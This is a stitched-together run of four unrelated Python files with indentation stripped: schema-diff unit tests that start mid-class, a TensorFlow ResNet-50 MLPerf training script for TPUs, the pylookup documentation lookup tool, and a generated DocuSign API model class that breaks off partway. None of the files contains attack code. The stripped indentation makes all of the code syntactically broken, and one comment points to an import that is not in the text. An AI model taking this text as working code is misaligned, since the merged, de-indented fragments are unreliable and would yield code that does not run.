def _run_diff(self,**kw):
return schemadiff.getDiffOfModelAgainstDatabase(
self.meta, self.engine, **kw
)
@fixture.usedb()
def test_table_missing_in_db(self):
self._make_table(create=False)
diff = self._run_diff()
self.assertTrue(diff)
eq_('Schema diffs:\n tables missing from database: xtable',
str(diff))
@fixture.usedb()
def test_table_missing_in_model(self):
self._make_table()
self.meta.clear()
diff = self._run_diff()
self.assertTrue(diff)
eq_('Schema diffs:\n tables missing from model: xtable',
str(diff))
@fixture.usedb()
def test_column_missing_in_db(self):
# db
Table('xtable', self.meta,
Column('id',Integer(), primary_key=True),
).create()
self.meta.clear()
# model
self._make_table(
Column('xcol',Integer()),
create=False
)
# run diff
diff = self._run_diff()
self.assertTrue(diff)
eq_('Schema diffs:\n'
' table with differences: xtable\n'
' database missing these columns: xcol',
str(diff))
@fixture.usedb()
def test_column_missing_in_model(self):
# db
self._make_table(
Column('xcol',Integer()),
)
self.meta.clear()
# model
self._make_table(
create=False
)
# run diff
diff = self._run_diff()
self.assertTrue(diff)
eq_('Schema diffs:\n'
' table with differences: xtable\n'
' model missing these columns: xcol',
str(diff))
@fixture.usedb()
def test_exclude_tables(self):
# db
Table('ytable', self.meta,
Column('id',Integer(), primary_key=True),
).create()
Table('ztable', self.meta,
Column('id',Integer(), primary_key=True),
).create()
self.meta.clear()
# model
self._make_table(
create=False
)
Table('ztable', self.meta,
Column('id',Integer(), primary_key=True),
)
# run diff
diff = self._run_diff(excludeTables=('xtable','ytable'))
# ytable only in database
# xtable only in model
# ztable identical on both
# ...so we expect no diff!
self.assertFalse(diff)
eq_('No schema diffs',str(diff))
@fixture.usedb()
def test_identical_just_pk(self):
self._make_table()
diff = self._run_diff()
self.assertFalse(diff)
eq_('No schema diffs',str(diff))
@fixture.usedb()
def test_different_type(self):
self._assert_diff(
Column('data', String(10)),
Column('data', Integer()),
)
@fixture.usedb()
def test_int_vs_float(self):
self._assert_diff(
Column('data', Integer()),
Column('data', Float()),
)
@fixture.usedb()
def test_float_vs_numeric(self):
self._assert_diff(
Column('data', Float()),
Column('data', Numeric()),
)
@fixture.usedb()
def test_numeric_precision(self):
self._assert_diff(
Column('data', Numeric(precision=5)),
Column('data', Numeric(precision=6)),
)
@fixture.usedb()
def test_numeric_scale(self):
self._assert_diff(
Column('data', Numeric(precision=6,scale=0)),
Column('data', Numeric(precision=6,scale=1)),
)
@fixture.usedb()
def test_string_length(self):
self._assert_diff(
Column('data', String(10)),
Column('data', String(20)),
)
@fixture.usedb()
def test_integer_identical(self):
self._make_table(
Column('data', Integer()),
)
diff = self._run_diff()
eq_('No schema diffs',str(diff))
self.assertFalse(diff)
@fixture.usedb()
def test_string_identical(self):
self._make_table(
Column('data', String(10)),
)
diff = self._run_diff()
eq_('No schema diffs',str(diff))
self.assertFalse(diff)
@fixture.usedb()
def test_text_identical(self):
self._make_table(
Column('data', Text(255)),
)
diff = self._run_diff()
eq_('No schema diffs',str(diff))
self.assertFalse(diff)
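# A minimal usage sketch (illustrative, relying on the star import above;
# assumes an in-memory SQLite engine) of the helper these tests exercise.
if __name__ == '__main__':
    engine = create_engine('sqlite://')
    meta = MetaData(engine)
    Table('xtable', meta, Column('id', Integer(), primary_key=True))
    meta.create_all()  # make the database match the model exactly
    diff = schemadiff.getDiffOfModelAgainstDatabase(meta, engine)
    print(str(diff))  # -> 'No schema diffs'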
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Train a ResNet-50 model on ImageNet on TPU."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
from absl import app
from absl import flags
import numpy as np
import tensorflow.compat.v1 as tf
from REDACTED.tensorflow_models.mlperf.models.rough.mlp_log import mlp_log
from REDACTED.tensorflow_models.mlperf.models.rough.resnet import imagenet_input
from REDACTED.tensorflow_models.mlperf.models.rough.resnet import lars_util
from REDACTED.tensorflow_models.mlperf.models.rough.resnet import resnet_model
from REDACTED.tensorflow_models.mlperf.models.rough.util import train_and_eval_runner
FLAGS = flags.FLAGS
# Model specific flags
flags.DEFINE_string(
'data_dir', default=None,
help=('The directory where the ImageNet input data is stored. Please see'
' the README.md for the expected data format.'))
flags.DEFINE_integer(
'resnet_depth', default=50,
help=('Depth of ResNet model to use. Must be one of {18, 34, 50, 101, 152,'
' 200}. ResNet-18 and 34 use the pre-activation residual blocks'
' without bottleneck layers. The other models use pre-activation'
' bottleneck layers. Deeper models require more training time and'
' more memory and may require reducing --train_batch_size to prevent'
' running out of memory.'))
flags.DEFINE_integer(
'train_steps', default=112590,
help=('The number of steps to use for training. Default is 112590 steps'
' which is approximately 90 epochs at batch size 1024. This flag'
' should be adjusted according to the --train_batch_size flag.'))
flags.DEFINE_integer(
'train_batch_size', default=1024, help='Batch size for training.')
flags.DEFINE_integer(
'eval_batch_size', default=1024, help='Batch size for evaluation.')
flags.DEFINE_integer(
'num_train_images', default=1281167, help='Size of training data set.')
flags.DEFINE_integer(
'num_eval_images', default=50000, help='Size of evaluation data set.')
flags.DEFINE_integer(
'num_label_classes', default=1000, help='Number of classes, at least 2')
flags.DEFINE_integer(
'steps_per_eval', default=1251,
help=('Controls how often evaluation is performed. Since evaluation is'
' fairly expensive, it is advised to evaluate as infrequently as'
' possible (i.e. up to --train_steps, which evaluates the model only'
' after finishing the entire training regime).'))
flags.DEFINE_integer(
'iterations_per_loop', default=1251,
help=('Number of steps to run on TPU before outfeeding metrics to the CPU.'
' If the number of iterations in the loop would exceed the number of'
' train steps, the loop will exit before reaching'
' --iterations_per_loop. The larger this value is, the higher the'
' utilization on the TPU.'))
flags.DEFINE_integer(
'dataset_threadpool_size', default=48,
    help=('The size of the private threadpool used by the dataset.'))
flags.DEFINE_integer('num_replicas', default=8, help=('Number of replicas.'))
flags.DEFINE_string(
'precision', default='bfloat16',
help=('Precision to use; one of: {bfloat16, float32}'))
flags.DEFINE_float(
'base_learning_rate', default=0.1,
help=('Base learning rate when train batch size is 256.'))
flags.DEFINE_float(
'momentum', default=0.9,
help=('Momentum parameter used in the MomentumOptimizer.'))
flags.DEFINE_float(
'weight_decay', default=1e-4,
    help=('Weight decay coefficient for l2 regularization.'))
flags.DEFINE_float(
'label_smoothing', default=0.0,
help=('Label smoothing parameter used in the softmax_cross_entropy'))
flags.DEFINE_bool('enable_lars',
default=False,
help=('Enable LARS optimizer for large batch training.'))
flags.DEFINE_float('poly_rate', default=0.0,
help=('Set LARS/Poly learning rate.'))
flags.DEFINE_float(
'stop_threshold', default=0.759, help=('Stop threshold for MLPerf.'))
flags.DEFINE_integer('image_size', 224, 'The input image size.')
flags.DEFINE_integer(
'distributed_group_size',
default=1,
help=('When set to > 1, it will enable distributed batch normalization'))
tf.flags.DEFINE_multi_integer(
'input_partition_dims',
default=None,
help=('Number of partitions on each dimension of the input. Each TPU core'
' processes a partition of the input image in parallel using spatial'
' partitioning.'))
flags.DEFINE_bool(
'use_space_to_depth',
default=False,
help=('Enable space-to-depth optimization for conv-0.'))
# Learning rate schedule
LR_SCHEDULE = [ # (multiplier, epoch to start) tuples
(1.0, 5), (0.1, 30), (0.01, 60), (0.001, 80)
]
# The input tensor is in the range [0, 255]; the constants below are the
# per-channel ImageNet mean and standard deviation scaled to that range,
# used to normalize images to zero mean and unit variance.
MEAN_RGB = [0.485 * 255, 0.456 * 255, 0.406 * 255]
STDDEV_RGB = [0.229 * 255, 0.224 * 255, 0.225 * 255]
def learning_rate_schedule(current_epoch):
"""Handles linear scaling rule, gradual warmup, and LR decay.
The learning rate starts at 0, then it increases linearly per step.
After 5 epochs we reach the base learning rate (scaled to account
for batch size).
After 30, 60 and 80 epochs the learning rate is divided by 10.
After 90 epochs training stops and the LR is set to 0. This ensures
that we train for exactly 90 epochs for reproducibility.
Args:
current_epoch: `Tensor` for current epoch.
Returns:
A scaled `Tensor` for current learning rate.
"""
mlp_log.mlperf_print('lars_opt_base_learning_rate', FLAGS.base_learning_rate)
scaled_lr = FLAGS.base_learning_rate * (FLAGS.train_batch_size / 256.0)
decay_rate = (scaled_lr * LR_SCHEDULE[0][0] *
current_epoch / LR_SCHEDULE[0][1])
for mult, start_epoch in LR_SCHEDULE:
decay_rate = tf.where(current_epoch < start_epoch,
decay_rate, scaled_lr * mult)
return decay_rate
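# Worked example with the defaults (train_batch_size=1024, base LR 0.1):
# scaled_lr = 0.1 * 1024 / 256 = 0.4. During warmup, epoch 2 gives
# 0.4 * 2 / 5 = 0.16; from epoch 5 the LR is 0.4, dropping to 0.04 after
# epoch 30, 0.004 after 60 and 0.0004 after 80.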
def resnet_model_fn(features, labels, is_training):
"""The model_fn for ResNet to be used with TPU.
Args:
features: `Tensor` of batched images.
labels: `Tensor` of labels for the data samples
is_training: whether this is training
Returns:
train_op, logits
"""
if isinstance(features, dict):
features = features['feature']
if FLAGS.use_space_to_depth:
if FLAGS.train_batch_size // FLAGS.num_replicas > 8:
features = tf.reshape(
features, [FLAGS.image_size // 2, FLAGS.image_size // 2, 12, -1])
features = tf.transpose(features, [3, 0, 1, 2]) # HWCN to NHWC
else:
features = tf.reshape(
features, [FLAGS.image_size // 2, FLAGS.image_size // 2, -1, 12])
features = tf.transpose(features, [2, 0, 1, 3]) # HWNC to NHWC
else:
if FLAGS.train_batch_size // FLAGS.num_replicas > 8:
features = tf.reshape(features,
[FLAGS.image_size, FLAGS.image_size, 3, -1])
features = tf.transpose(features, [3, 0, 1, 2]) # HWCN to NHWC
else:
features = tf.reshape(features,
[FLAGS.image_size, FLAGS.image_size, -1, 3])
      features = tf.transpose(features, [2, 0, 1, 3])  # HWNC to NHWC
# Normalize the image to zero mean and unit variance.
if FLAGS.use_space_to_depth:
features -= tf.constant(MEAN_RGB, shape=[1, 1, 12], dtype=features.dtype)
features /= tf.constant(STDDEV_RGB, shape=[1, 1, 12], dtype=features.dtype)
else:
features -= tf.constant(MEAN_RGB, shape=[1, 1, 3], dtype=features.dtype)
features /= tf.constant(STDDEV_RGB, shape=[1, 1, 3], dtype=features.dtype)
# This nested function allows us to avoid duplicating the logic which
# builds the network, for different values of --precision.
def build_network():
with tf.variable_scope('resnet', reuse=tf.AUTO_REUSE):
network = resnet_model.resnet_v1(
resnet_depth=FLAGS.resnet_depth,
num_classes=FLAGS.num_label_classes,
use_space_to_depth=FLAGS.use_space_to_depth,
num_replicas=FLAGS.num_replicas,
distributed_group_size=FLAGS.distributed_group_size)
return network(inputs=features, is_training=is_training)
if FLAGS.precision == 'bfloat16':
with tf.tpu.bfloat16_scope():
logits = build_network()
logits = tf.cast(logits, tf.float32)
elif FLAGS.precision == 'float32':
logits = build_network()
if not is_training:
total_correct = tf.reduce_sum(
tf.cast(
tf.equal(tf.cast(tf.argmax(logits, axis=1), labels.dtype), labels),
tf.int32))
return None, {'total_correct': tf.reshape(total_correct, [-1])}
# Calculate loss, which includes softmax cross entropy and L2 regularization.
one_hot_labels = tf.one_hot(labels, FLAGS.num_label_classes)
cross_entropy = tf.losses.softmax_cross_entropy(
logits=logits,
onehot_labels=one_hot_labels,
label_smoothing=FLAGS.label_smoothing)
# Add weight decay to the loss for non-batch-normalization variables.
if FLAGS.enable_lars:
loss = cross_entropy
else:
loss = cross_entropy + FLAGS.weight_decay * tf.add_n([
tf.nn.l2_loss(v)
for v in tf.trainable_variables()
if 'batch_normalization' not in v.name
])
global_step = tf.train.get_or_create_global_step()
steps_per_epoch = FLAGS.num_train_images / FLAGS.train_batch_size
current_epoch = (tf.cast(global_step, tf.float32) / steps_per_epoch)
mlp_log.mlperf_print(
'model_bn_span',
FLAGS.distributed_group_size *
(FLAGS.train_batch_size // FLAGS.num_replicas))
if FLAGS.enable_lars:
learning_rate = 0.0
mlp_log.mlperf_print('opt_name', 'lars')
optimizer = lars_util.init_lars_optimizer(current_epoch)
else:
mlp_log.mlperf_print('opt_name', 'sgd')
learning_rate = learning_rate_schedule(current_epoch)
optimizer = tf.train.MomentumOptimizer(
learning_rate=learning_rate, momentum=FLAGS.momentum, use_nesterov=True)
optimizer = tf.tpu.CrossShardOptimizer(optimizer)
# Batch normalization requires UPDATE_OPS to be added as a dependency to
# the train operation.
with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
train_op = optimizer.minimize(loss, global_step)
return train_op, None
def main(unused_argv):
def eval_init_fn(cur_step):
"""Executed before every eval."""
steps_per_epoch = FLAGS.num_train_images / FLAGS.train_batch_size
epoch = cur_step // steps_per_epoch
mlp_log.mlperf_print(
'block_start',
None,
metadata={
'first_epoch_num': epoch,
'epoch_count': 4
})
def eval_finish_fn(cur_step, eval_output, summary_writer):
"""Executed after every eval."""
steps_per_epoch = FLAGS.num_train_images / FLAGS.train_batch_size
epoch = cur_step // steps_per_epoch
eval_accuracy = float(np.sum(
eval_output['total_correct'])) / FLAGS.num_eval_images
if summary_writer:
with tf.Graph().as_default():
summary_writer.add_summary(
tf.Summary(value=[
tf.Summary.Value(tag='accuracy', simple_value=eval_accuracy)
]), cur_step)
mlp_log.mlperf_print(
'eval_accuracy',
eval_accuracy,
metadata={
'epoch_num': epoch + FLAGS.iterations_per_loop // steps_per_epoch
})
mlp_log.mlperf_print(
'block_stop',
None,
metadata={
'first_epoch_num': epoch,
'epoch_count': 4
})
if eval_accuracy >= FLAGS.stop_threshold:
mlp_log.mlperf_print('run_stop', None, metadata={'status': 'success'})
return True
else:
return False
def run_finish_fn(success):
if not success:
mlp_log.mlperf_print('run_stop', None, metadata={'status': 'abort'})
mlp_log.mlperf_print('run_final', None)
low_level_runner = train_and_eval_runner.TrainAndEvalRunner(
FLAGS.iterations_per_loop, FLAGS.train_steps,
int(math.ceil(FLAGS.num_eval_images / FLAGS.eval_batch_size)),
FLAGS.num_replicas)
mlp_log.mlperf_print('cache_clear', True)
mlp_log.mlperf_print('init_start', None)
mlp_log.mlperf_print('global_batch_size', FLAGS.train_batch_size)
mlp_log.mlperf_print('lars_opt_weight_decay', FLAGS.weight_decay)
mlp_log.mlperf_print('lars_opt_momentum', FLAGS.momentum)
mlp_log.mlperf_print('submission_benchmark', 'resnet')
mlp_log.mlperf_print('submission_division', 'closed')
mlp_log.mlperf_print('submission_org', 'google')
mlp_log.mlperf_print('submission_platform', 'tpu-v3-%d' % FLAGS.num_replicas)
mlp_log.mlperf_print('submission_status', 'research')
assert FLAGS.precision == 'bfloat16' or FLAGS.precision == 'float32', (
'Invalid value for --precision flag; must be bfloat16 or float32.')
input_dtype = tf.bfloat16 if FLAGS.precision == 'bfloat16' else tf.float32
  cache_decoded_image = FLAGS.num_replicas > 2048
imagenet_train, imagenet_eval = [
imagenet_input.get_input_fn( # pylint: disable=g-complex-comprehension
FLAGS.data_dir,
is_training,
input_dtype,
FLAGS.image_size,
FLAGS.input_partition_dims is None,
cache_decoded_image=cache_decoded_image)
for is_training in [True, False]
]
low_level_runner.initialize(imagenet_train, imagenet_eval, resnet_model_fn,
FLAGS.train_batch_size, FLAGS.eval_batch_size,
FLAGS.input_partition_dims)
mlp_log.mlperf_print('train_samples', FLAGS.num_train_images)
mlp_log.mlperf_print('eval_samples', FLAGS.num_eval_images)
mlp_log.mlperf_print('init_stop', None)
mlp_log.mlperf_print('run_start', None)
low_level_runner.train_and_eval(eval_init_fn, eval_finish_fn, run_finish_fn)
if __name__ == '__main__':
app.run(main)
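# Hypothetical invocation (script name, bucket path and sizes are
# placeholders; only flags defined above are used):
#   python resnet_main.py --data_dir=gs://my-bucket/imagenet \
#     --train_batch_size=4096 --num_replicas=32 --enable_lars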
#!/usr/bin/env python2
"""
Pylookup is a tool to look up entries from the Python documentation,
especially within Emacs. Pylookup adopts most of its ideas from haddoc,
a lovely toolkit by Martin Blais.
(usage)
./pylookup.py -l ljust
./pylookup.py -u http://docs.python.org
"""
from __future__ import with_statement
import os
import sys
import re
try:
import cPickle as pickle
except ImportError:
import pickle
import formatter
from os.path import join, dirname, exists, abspath, expanduser
from contextlib import closing
if sys.version_info[0] == 3:
import html.parser as htmllib
import urllib.parse as urlparse
import urllib.request as urllib
else:
import htmllib, urllib, urlparse
VERBOSE = False
FORMATS = {
"Emacs" : "{entry}\t({desc})\t[{book}];{url}",
"Terminal" : "{entry}\t({desc})\t[{book}]\n{url}"
}
def build_book(s, num):
"""
Build book identifier from `s`, with `num` links.
"""
for matcher, replacement in (("library", "lib"),
("c-api", "api"),
("reference", "ref"),
("", "etc")):
if matcher in s:
return replacement if num == 1 else "%s/%d" % (replacement, num)
def trim(s):
"""
    Add any global filtering rules here
"""
s = s.replace( "Python Enhancement Proposals!", "")
s = s.replace( "PEP ", "PEP-")
return s
class Element(object):
def __init__(self, entry, desc, book, url):
self.book = book
self.url = url
self.desc = desc
self.entry = entry
def __format__(self, format_spec):
return format_spec.format(entry=self.entry, desc=self.desc,
book=self.book, url=self.url)
def match_insensitive(self, key):
"""
Match key case insensitive against entry and desc.
`key` : Lowercase string.
"""
return key in self.entry.lower() or key in self.desc.lower()
def match_sensitive(self, key):
"""
Match key case sensitive against entry and desc.
`key` : Lowercase string.
"""
return key in self.entry or key in self.desc
def match_in_entry_insensitive(self, key):
"""
Match key case insensitive against entry.
`key` : Lowercase string.
"""
return key in self.entry.lower()
def match_in_entry_sensitive(self, key):
"""
Match key case sensitive against entry.
`key` : Lowercase string.
"""
return key in self.entry
def get_matcher(insensitive=True, desc=True):
"""
Get `Element.match_*` function.
>>> get_matcher(0, 0)
<unbound method Element.match_in_entry_sensitive>
>>> get_matcher(1, 0)
<unbound method Element.match_in_entry_insensitive>
>>> get_matcher(0, 1)
<unbound method Element.match_sensitive>
>>> get_matcher(1, 1)
<unbound method Element.match_insensitive>
"""
_sensitive = "_insensitive" if insensitive else "_sensitive"
_in_entry = "" if desc else "_in_entry"
return getattr(Element, "match{0}{1}".format(_in_entry, _sensitive))
class IndexProcessor( htmllib.HTMLParser ):
"""
Extract the index links from a Python HTML documentation index.
"""
def __init__( self, writer, dirn):
htmllib.HTMLParser.__init__( self, formatter.NullFormatter() )
self.writer = writer
self.dirn = dirn
self.entry = ""
self.desc = ""
self.list_entry = False
self.do_entry = False
self.one_entry = False
self.num_of_a = 0
self.desc_cnt = 0
def start_dd( self, att ):
self.list_entry = True
def end_dd( self ):
self.list_entry = False
def start_dt( self, att ):
self.one_entry = True
self.num_of_a = 0
def end_dt( self ):
self.do_entry = False
def start_a( self, att ):
if self.one_entry:
self.url = join( self.dirn, dict( att )[ 'href' ] )
self.save_bgn()
def end_a( self ):
global VERBOSE
if self.one_entry:
if self.num_of_a == 0 :
self.desc = self.save_end()
if VERBOSE:
self.desc_cnt += 1
if self.desc_cnt % 100 == 0:
sys.stdout.write("%04d %s\r" \
% (self.desc_cnt, self.desc.ljust(80)))
                # extract first element
# ex) __and__() (in module operator)
if not self.list_entry :
self.entry = re.sub( "\([^)]+\)", "", self.desc )
# clean up PEP
self.entry = trim(self.entry)
match = re.search( "\([^)]+\)", self.desc )
if match :
self.desc = match.group(0)
self.desc = trim(re.sub( "[()]", "", self.desc ))
self.num_of_a += 1
book = build_book(self.url, self.num_of_a)
e = Element(self.entry, self.desc, book, self.url)
self.writer(e)
def update(db, urls, append=False):
"""Update database with entries from urls.
`db` : filename to database
`urls` : list of URL
`append` : append to db
"""
mode = "ab" if append else "wb"
with open(db, mode) as f:
writer = lambda e: pickle.dump(e, f)
for url in urls:
            # detect 'file' or 'url' schemes
parsed = urlparse.urlparse(url)
if not parsed.scheme or parsed.scheme == "file":
dst = abspath(expanduser(parsed.path))
if not os.path.exists(dst):
print("Error: %s doesn't exist" % dst)
exit(1)
url = "file://%s" % dst
else:
url = parsed.geturl()
potential_urls = []
if url.endswith('.html'):
potential_urls.append(url)
else:
# guess index URLs
# for stdlib, this is genindex-all.html
# for django, numpy, etc. it's genindex.html
url = url.rstrip("/")
potential_urls.append(url + "/genindex-all.html")
potential_urls.append(url + "/genindex.html")
success = False
for index_url in potential_urls:
try:
print "Wait for a few seconds..."
print "Fetching index from '%s'" % index_url
index = urllib.urlopen(index_url).read()
if not issubclass(type(index), str):
index = index.decode()
parser = IndexProcessor(writer, dirname(index_url))
with closing(parser):
parser.feed(index)
# success, we don't need to try other potential urls
print "Loaded index from '%s'" % index_url
success = True
break
except IOError:
print "Error: fetching file from '%s'" % index_url
if not success:
print "Failed to load index for input '%s'" % url
def lookup(db, key, format_spec, out=sys.stdout, insensitive=True, desc=True):
"""Lookup key from database and print to out.
`db` : filename to database
`key` : key to lookup
`out` : file-like to write to
`insensitive` : lookup key case insensitive
"""
matcher = get_matcher(insensitive, desc)
if insensitive:
key = key.lower()
with open(db, "rb") as f:
try:
while True:
e = pickle.load(f)
if matcher(e, key):
out.write('%s\n' % format(e, format_spec))
except EOFError:
pass
def cache(db, out=sys.stdout):
"""Print unique entries from db to out.
`db` : filename to database
`out` : file-like to write to
"""
with open(db, "rb") as f:
keys = set()
try:
while True:
e = pickle.load(f)
k = e.entry
k = re.sub( "\([^)]*\)", "", k )
k = re.sub( "\[[^]]*\]", "", k )
keys.add(k)
except EOFError:
pass
for k in keys:
out.write('%s\n' % k)
if __name__ == "__main__":
import optparse
parser = optparse.OptionParser( __doc__.strip() )
parser.add_option( "-d", "--db",
help="database name",
dest="db", default="pylookup.db" )
parser.add_option( "-l", "--lookup",
help="keyword to search",
dest="key" )
parser.add_option( "-u", "--update",
help="update url or path",
action="append", type="str", dest="url" )
parser.add_option( "-c", "--cache" ,
help="extract keywords, internally used",
action="store_true", default=False, dest="cache")
parser.add_option( "-a", "--append",
help="append to the db from multiple sources",
action="store_true", default=False, dest="append")
parser.add_option( "-f", "--format",
help="type of output formatting, valid: Emacs, Terminal",
choices=["Emacs", "Terminal"],
default="Terminal", dest="format")
parser.add_option( "-i", "--insensitive", default=1, choices=['0', '1'],
help="SEARCH OPTION: insensitive search "
"(valid: 0, 1; default: %default)")
parser.add_option( "-s", "--desc", default=1, choices=['0', '1'],
help="SEARCH OPTION: include description field "
"(valid: 0, 1; default: %default)")
parser.add_option("-v", "--verbose",
help="verbose", action="store_true",
dest="verbose", default=False)
( opts, args ) = parser.parse_args()
VERBOSE = opts.verbose
if opts.url:
update(opts.db, opts.url, opts.append)
if opts.cache:
cache(opts.db)
if opts.key:
lookup(opts.db, opts.key, FORMATS[opts.format],
insensitive=int(opts.insensitive), desc=int(opts.desc))
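# Programmatic sketch (illustrative): after building pylookup.db with
# `./pylookup.py -u http://docs.python.org`, lookup() can be scripted
# directly instead of going through the CLI:
#
#   import io
#   buf = io.StringIO()
#   lookup('pylookup.db', 'ljust', FORMATS['Emacs'], out=buf)
#   print(buf.getvalue())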
# coding: utf-8
"""
DocuSign REST API
The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign. # noqa: E501
OpenAPI spec version: v2.1
Contact: devcenter@docusign.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class WorkspaceUserAuthorization(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'can_delete': 'str',
'can_move': 'str',
'can_transact': 'str',
'can_view': 'str',
'created': 'str',
'created_by_id': 'str',
'error_details': 'ErrorDetails',
'modified': 'str',
'modified_by_id': 'str',
'workspace_user_id': 'str',
'workspace_user_information': 'WorkspaceUser'
}
attribute_map = {
'can_delete': 'canDelete',
'can_move': 'canMove',
'can_transact': 'canTransact',
'can_view': 'canView',
'created': 'created',
'created_by_id': 'createdById',
'error_details': 'errorDetails',
'modified': 'modified',
'modified_by_id': 'modifiedById',
'workspace_user_id': 'workspaceUserId',
'workspace_user_information': 'workspaceUserInformation'
}
def __init__(self, can_delete=None, can_move=None, can_transact=None, can_view=None, created=None, created_by_id=None, error_details=None, modified=None, modified_by_id=None, workspace_user_id=None, workspace_user_information=None): # noqa: E501
"""WorkspaceUserAuthorization - a model defined in Swagger""" # noqa: E501
self._can_delete = None
self._can_move = None
self._can_transact = None
self._can_view = None
self._created = None
self._created_by_id = None
self._error_details = None
self._modified = None
self._modified_by_id = None
self._workspace_user_id = None
self._workspace_user_information = None
self.discriminator = None
if can_delete is not None:
self.can_delete = can_delete
if can_move is not None:
self.can_move = can_move
if can_transact is not None:
self.can_transact = can_transact
if can_view is not None:
self.can_view = can_view
if created is not None:
self.created = created
if created_by_id is not None:
self.created_by_id = created_by_id
if error_details is not None:
self.error_details = error_details
if modified is not None:
self.modified = modified
if modified_by_id is not None:
self.modified_by_id = modified_by_id
if workspace_user_id is not None:
self.workspace_user_id = workspace_user_id
if workspace_user_information is not None:
self.workspace_user_information = workspace_user_information
@property
def can_delete(self):
"""Gets the can_delete of this WorkspaceUserAuthorization. # noqa: E501
# noqa: E501
:return: The can_delete of this WorkspaceUserAuthorization. # noqa: E501
:rtype: str
"""
return self._can_delete
@can_delete.setter
def can_delete(self, can_delete):
"""Sets the can_delete of this WorkspaceUserAuthorization.
# noqa: E501
:param can_delete: The can_delete of this WorkspaceUserAuthorization. # noqa: E501
:type: str
"""
self._can_delete = can_delete
@property
def can_move(self):
"""Gets the can_move of this WorkspaceUserAuthorization. # noqa: E501
# noqa: E501
:return: The can_move of this WorkspaceUserAuthorization. # noqa: E501
:rtype: str
"""
return self._can_move
@can_move.setter
def can_move(self, can_move):
"""Sets the can_move of this WorkspaceUserAuthorization.
# noqa: E501
:param can_move: The can_move of this WorkspaceUserAuthorization. # noqa: E501
:type: str
"""
self._can_move = can_move
@property
def can_transact(self):
"""Gets the can_transact of this WorkspaceUserAuthorization. # noqa: E501
# noqa: E501
:return: The can_transact of this WorkspaceUserAuthorization. # noqa: E501
:rtype: str
"""
return self._can_transact
@can_transact.setter
def can_transact(self, can_transact):
"""Sets the can_transact of this WorkspaceUserAuthorization.
# noqa: E501
:param can_transact: The can_transact of this WorkspaceUserAuthorization. # noqa: E501
:type: str
"""
self._can_transact = can_transact
@property
def can_view(self):
"""Gets the can_view of this WorkspaceUserAuthorization. # noqa: E501
# noqa: E501
:return: The can_view of this WorkspaceUserAuthorization. # noqa: E501
:rtype: str
"""
return self._can_view
@can_view.setter
def can_view(self, can_view):
"""Sets the can_view of this WorkspaceUserAuthorization.
# noqa: E501
:param can_view: The can_view of this WorkspaceUserAuthorization. # noqa: E501
:type: str
"""
self._can_view = can_view
@property
def created(self):
"""Gets the created of this WorkspaceUserAuthorization. # noqa: E501
The UTC DateTime when the workspace user authorization was created. # noqa: E501
:return: The created of this WorkspaceUserAuthorization. # noqa: E501
:rtype: str
"""
return self._created
@created.setter
def created(self, created):
"""Sets the created of this WorkspaceUserAuthorization.
The UTC DateTime when the workspace user authorization was created. # noqa: E501
:param created: The created of this WorkspaceUserAuthorization. # noqa: E501
:type: str
"""
self._created = created
@property
def created_by_id(self):
"""Gets the created_by_id of this WorkspaceUserAuthorization. # noqa: E501
# noqa: E501
:return: The created_by_id of this WorkspaceUserAuthorization. # noqa: E501
:rtype: str
"""
return self._created_by_id
@created_by_id.setter
def created_by_id(self, created_by_id):
"""Sets the created_by_id of this WorkspaceUserAuthorization.
# noqa: E501
:param created_by_id: The created_by_id of this WorkspaceUserAuthorization. # noqa: E501
:type: str
"""
self._created_by_id = created_by_id
@property
def error_details(self):
"""Gets the error_details of this WorkspaceUserAuthorization. # noqa: E501
:return: The error_details of this WorkspaceUserAuthorization. # noqa: E501
:rtype: ErrorDetails
"""
return self._error_details
@error_details.setter
def error_details(self, error_details):
"""Sets the error_details of this WorkspaceUserAuthorization.
:param error_details: The error_details of this WorkspaceUserAuthorization. # noqa: E501
:type: ErrorDetails
"""
self._error_details = error_details
@property
def modified(self):
"""Gets the modified of this WorkspaceUserAuthorization. # noqa: E501
# noqa: E501
:return: The modified of this WorkspaceUserAuthorization. # noqa: E501
:rtype: str
"""
return self._modified
@modified.setter
def modified(self, modified):
"""Sets the modified of this WorkspaceUserAuthorization.
# noqa: E501
:param modified: The modified of this WorkspaceUserAuthorization. # noqa: E501
:type: str
"""
self._modified = modified
@property
def modified_by_id(self):
"""Gets the modified_by_id of this WorkspaceUserAuthorization. # noqa: E501
# noqa: E501
:return: The modified_by_id of this WorkspaceUserAuthorization. # noqa: E501
:rtype: str
"""
return self._modified_by_id
@modified_by_id.setter
def modified_by_id(self, modified_by_id):
"""Sets the modified_by_id of this WorkspaceUserAuthorization.
# noqa: E501
:param modified_by_id: The modified_by_id of this WorkspaceUserAuthorization. # noqa: E501
:type: str
"""
self._modified_by_id = modified_by_id
@property
def workspace_user_id(self):
"""Gets the workspace_user_id of this WorkspaceUserAuthorization. # noqa: E501
# noqa: E501
:return: The workspace_user_id of this WorkspaceUserAuthorization. # noqa: E501
:rtype: str
"""
return self._workspace_user_id
@workspace_user_id.setter
def workspace_user_id(self, workspace_user_id):
"""Sets the workspace_user_id of this WorkspaceUserAuthorization.
# noqa: E501
:param workspace_user_id: The workspace_user_id of this WorkspaceUserAuthorization. # noqa: E501
:type: str
"""
self._workspace_user_id = workspace_user_id
@property
def workspace_user_information(self):
"""Gets the workspace_user_information of this WorkspaceUserAuthorization. # noqa: E501
:return: The workspace_user_information of this WorkspaceUserAuthorization. # noqa: E501
:rtype: WorkspaceUser
"""
return self._workspace_user_information
@workspace_user_information.setter
def workspace_user_information(self, workspace_user_information):
"""Sets the workspace_user_information of this WorkspaceUserAuthorization.
